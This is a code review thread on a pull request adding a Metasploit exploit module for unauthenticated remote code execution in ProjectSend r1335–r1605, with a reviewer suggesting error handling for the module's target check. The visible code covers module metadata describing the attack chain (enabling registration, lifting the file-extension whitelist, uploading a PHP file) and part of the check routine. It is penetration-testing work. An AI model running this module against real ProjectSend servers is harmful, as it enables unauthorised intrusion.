modules/exploits/linux/http/projectsend_unauth_rce.rb

```diff
@@ -0,0 +1,394 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ProjectSend r1335 - r1605 Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits an improper authorization vulnerability in ProjectSend versions r1335 through r1605.
+          The vulnerability allows an unauthenticated attacker to obtain remote code execution by enabling user registration,
+          disabling the whitelist of allowed file extensions, and uploading a malicious PHP file to the server.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Florent Sicchio', # Discovery
+          'Hugo Clout', # Discovery
+          'ostrichgolf' # Metasploit module
+        ],
+        'References' => [
+          ['URL', 'https://github.com/projectsend/projectsend/commit/193367d937b1a59ed5b68dd4e60bd53317473744'],
+          ['URL', 'https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf'],
+        ],
+        'DisclosureDate' => '2024-07-19',
+        'DefaultTarget' => 0,
+        'Targets' => [
+          ['ProjectSend r1335 - r1605', { 'Platform' => 'php', 'Arch' => ARCH_PHP }]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new(
+          'TARGETURI',
+          [true, 'The TARGETURI for ProjectSend', '/']
+        )
+      ]
+    )
+  end
+
+  def check
+    csrf_token = get_csrf_token
+
+    # Obtain the current title of the website
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')
+    })
+
+    # The title will always contain "»" ("&raquo;") regardless of localization. For example: "Log in » ProjectSend"
+    title_regex = %r{<title>.*?&raquo;\s+(.*?)</title>}
+    original_title = res.body[title_regex, 1]
```

Comment:
It might be better to check if the target is reachable before doing anything else.
I noticed when you perform a `send_request_cgi` sometimes you ensure `res` is not `nil` but sometime you dont't, I will leave some comment with some suggestion to improve the error handling.
```suggestion

    # Obtain the current title of the website
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')
    })
    return CheckCode::Unknown("Target is not reachable") unless res

    # The title will always contain "»" ("&raquo;") regardless of localization. For example: "Log in » ProjectSend"
    title_regex = %r{<title>.*?&raquo;\s+(.*?)</title>}
    original_title = res.body[title_regex, 1]
    csrf_token = get_csrf_token
```